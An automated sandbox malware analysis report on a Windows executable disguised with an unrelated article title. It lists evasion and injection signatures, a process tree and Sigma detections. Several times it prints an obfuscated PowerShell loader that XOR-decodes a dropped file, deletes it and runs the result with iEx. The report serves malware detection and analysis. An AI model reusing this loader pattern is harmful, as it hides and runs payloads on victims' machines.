Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe

Overview

General Information

Sample name:Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Analysis ID:1555371
MD5:988955bfa46336be7eb44f11f5427699
SHA1:86f277c2e39af1a01575c30f601c4c411297c78e
SHA256:1c01b0f68306375e4cc9209e2bbb94965fbb943b75946a390a53fd05bb9b3c16
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Writes many files with high entropy
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" MD5: 988955BFA46336BE7EB44F11F5427699)
    • Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp (PID: 3564 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" MD5: F386E39F745DF29C2619F21BCA6DAEB7)
      • powershell.exe (PID: 7192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PhotoshopElements_2024_LS30_win64.exe (PID: 7360 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" MD5: 43843D75A5EEAD8EE3B71EE2ADCBA3FE)
        • PhotoshopElements_2024_LS30_win64.exe (PID: 7732 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1 MD5: 43843D75A5EEAD8EE3B71EE2ADCBA3FE)
        • chrome.exe (PID: 8016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 2848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 3036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 2648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • svchost.exe (PID: 7636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine|base64offset|contains: #0, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ParentProcessId: 3564, ParentProcessName: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine|base64offset|contains: #0, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ParentProcessId: 3564, ParentProcessName: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ParentCommandLine: "C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe", ParentImage: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, ParentProcessId: 6524, ParentProcessName: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , ProcessId: 3564, ProcessName: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", CommandLine|base64offset|contains: #0, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ParentProcessId: 3564, ParentProcessName: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7636, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: Number of links: 0
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: Base64 decoded: <?xml version="1.0" encoding="UTF-8"?><svg width="38px" height="38px" viewBox="0 0 38 38" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <!-- Generator: Sketch 44.1 (41455) - http://www.bohemiancoding.com...
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: Iframe src: https://adobe-api.arkoselabs.com/v2/2.11.2/enforcement.680e9fec55645f785d2cc2dbf0b3e151.html#430FF2C3-1AB1-40B7-8BE7-44FC683FE02C&dd99e75b-1478-45bf-a119-d1f0986751f3
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: <input type="password" .../> found
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: No favicon
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: No favicon
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: No <meta name="author".. found
Source: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true#/HTTP Parser: No <meta name="copyright".. found
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION PhotoshopElements_2024_LS30_win64.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user~1\AppData\Local\Temp\CreativeCloud\ACC\AdobeDownload\HDInstaller.log
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\LICENSE.txt
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.17.dr
